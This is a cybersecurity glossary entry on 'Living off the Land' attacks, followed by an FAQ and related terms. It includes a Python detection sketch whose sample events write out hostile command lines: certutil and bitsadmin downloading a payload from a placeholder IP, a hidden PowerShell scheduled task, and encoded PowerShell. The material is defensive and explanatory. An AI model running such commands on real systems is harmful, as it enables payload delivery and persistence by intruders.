Living off the Land
What is Living off the Land?
Living off the Land: An attacker tradecraft style that abuses legitimate, pre-installed tools and scripts on a victim system instead of dropping custom malware.
Living off the Land (LotL) describes intrusions where adversaries achieve execution, discovery, persistence, and lateral movement using built-in operating-system utilities and trusted administrative software (PowerShell, WMI, certutil, bitsadmin, schtasks, rundll32, ssh, curl, AWS CLI). Because these binaries are signed and expected, they often evade signature-based antivirus and blend into normal admin telemetry, making detection a behavioural problem rather than a file-hash problem. LotL is closely tied to MITRE ATT&CK defense-evasion and execution tactics and is heavily used by APT groups and ransomware affiliates. Defences focus on application control (WDAC/AppLocker), command-line and script-block logging, EDR behavioural analytics, and least privilege.
● Examples
- 01
Using certutil.exe to download a second-stage payload from an attacker-controlled URL.
- 02
Running encoded PowerShell with bitsadmin and scheduled tasks instead of installing an EXE.
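The two examples above are only visible in command-line telemetry, which is why the definition stresses command-line and script-block logging over file hashes. The following is an added detection sketch (not code from the original page): it runs four behavioural rules over constructed process-creation command lines, decoding the `-EncodedCommand` argument so an analyst sees the script rather than base64. Rule names, sample paths and the 203.0.113.0/24 addresses are assumptions.

```python
import base64
import shlex

# Constructed process-creation command lines, not real telemetry. The first four
# mirror the page's LotL examples; the last two are benign admin use for contrast.
ENCODED = base64.b64encode("Start-Sleep -Seconds 1".encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    r'C:\Windows\System32\certutil.exe -urlcache -split -f http://203.0.113.10/stage2.bin C:\Users\Public\s.bin',
    f'powershell.exe -NoP -W Hidden -EncodedCommand {ENCODED}',
    r'bitsadmin.exe /transfer job1 http://203.0.113.10/x.dat C:\Users\Public\x.dat',
    r'schtasks.exe /create /tn Updater /tr "powershell -w hidden -File C:\Users\Public\u.ps1" /sc minute /mo 5',
    r'certutil.exe -hashfile C:\installers\setup.msi SHA256',
    r'powershell.exe -File C:\scripts\backup.ps1',
]

def image_name(token):
    """Bare lowercase executable name from a (possibly quoted, Windows-style) path."""
    name = token.strip('"').replace("\\", "/").rsplit("/", 1)[-1].lower()
    return name[:-4] if name.endswith(".exe") else name

def decode_encoded_powershell(args):
    """Decode the script behind -e/-enc/-EncodedCommand (base64 of UTF-16LE), or None."""
    for flag, value in zip(args, args[1:]):
        stem = flag.lower().lstrip("-/")
        if stem and "encodedcommand".startswith(stem):  # PowerShell accepts any unambiguous prefix
            try:
                return base64.b64decode(value).decode("utf-16le")
            except (ValueError, UnicodeDecodeError):
                return "<undecodable>"
    return None

def analyze(cmdline):
    """Return (rule, detail) findings for one process-creation command line."""
    args = shlex.split(cmdline, posix=False)  # posix=False keeps backslashes and quotes intact
    image, low = image_name(args[0]), [a.lower() for a in args[1:]]
    has_url = any(a.startswith(("http://", "https://")) for a in low)
    findings = []
    if image == "certutil" and "-urlcache" in low and has_url:
        findings.append(("certutil_download", "certutil fetching a URL to disk"))
    if image == "bitsadmin" and "/transfer" in low and has_url:
        findings.append(("bitsadmin_download", "BITS transfer job created from the command line"))
    if image in ("powershell", "pwsh"):
        script = decode_encoded_powershell(args[1:])
        if script is not None:
            findings.append(("powershell_encoded", f"decoded: {script}"))
    if image == "schtasks" and "/create" in low:
        for flag, value in zip(low, low[1:]):
            if flag == "/tr" and any(t in value for t in ("powershell", "cmd.exe", "rundll32")):
                findings.append(("schtasks_script_task", "scheduled task launches a script host"))
    return findings
```

The benign `certutil -hashfile` and `powershell -File` lines produce no findings, which is the point: the rules key on behaviour (URL fetch, encoded script, task creation), not on the binary name alone.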
● Frequently asked questions
What is Living off the Land?
An attacker tradecraft style that abuses legitimate, pre-installed tools and scripts on a victim system instead of dropping custom malware. It belongs to the Attacks & Threats category of cybersecurity.
What does Living off the Land mean?
An attacker tradecraft style that abuses legitimate, pre-installed tools and scripts on a victim system instead of dropping custom malware.
How does Living off the Land work?
Living off the Land (LotL) describes intrusions where adversaries achieve execution, discovery, persistence, and lateral movement using built-in operating-system utilities and trusted administrative software (PowerShell, WMI, certutil, bitsadmin, schtasks, rundll32, ssh, curl, AWS CLI). Because these binaries are signed and expected, they often evade signature-based antivirus and blend into normal admin telemetry, making detection a behavioural problem rather than a file-hash problem. LotL is closely tied to MITRE ATT&CK defense-evasion and execution tactics and is heavily used by APT groups and ransomware affiliates. Defences focus on application control (WDAC/AppLocker), command-line and script-block logging, EDR behavioural analytics, and least privilege.
How do you defend against Living off the Land?
Defences for Living off the Land typically combine technical controls (application control such as WDAC/AppLocker, command-line and script-block logging, EDR behavioural analytics) with operational practices such as least privilege, as detailed in the full definition above.
What are other names for Living off the Land?
Common alternative names include: LotL, LOL.
● Related terms
- attacks № 632
LOLBin / LOLBAS
A signed, native binary or script (LOLBin/LOLBAS) that attackers misuse for execution, download, persistence, or bypass while looking like a legitimate admin tool.
- malware № 417
Fileless Malware
Malware that runs primarily in memory and leverages trusted system tools, avoiding the use of traditional executable files on disk.
- defense-ops № 298
Defense Evasion
The MITRE ATT&CK tactic (TA0005) covering techniques attackers use to avoid detection, disable security tools, and hide their activity on a target system.
- defense-ops № 682
Mimikatz
An open-source Windows post-exploitation tool that extracts plaintext passwords, hashes, Kerberos tickets, and other credentials from memory and LSASS.
- defense-ops № 371
EDR (Endpoint Detection and Response)
An endpoint security technology that continuously records process, file, registry and network activity to detect, investigate and respond to threats on hosts.
- defense-ops № 1147
Threat Hunting
Proactive, hypothesis-driven search through telemetry to uncover threats that have evaded existing detections.
● See also
- № 045 AMSI Bypass
- № 1186 UAC Bypass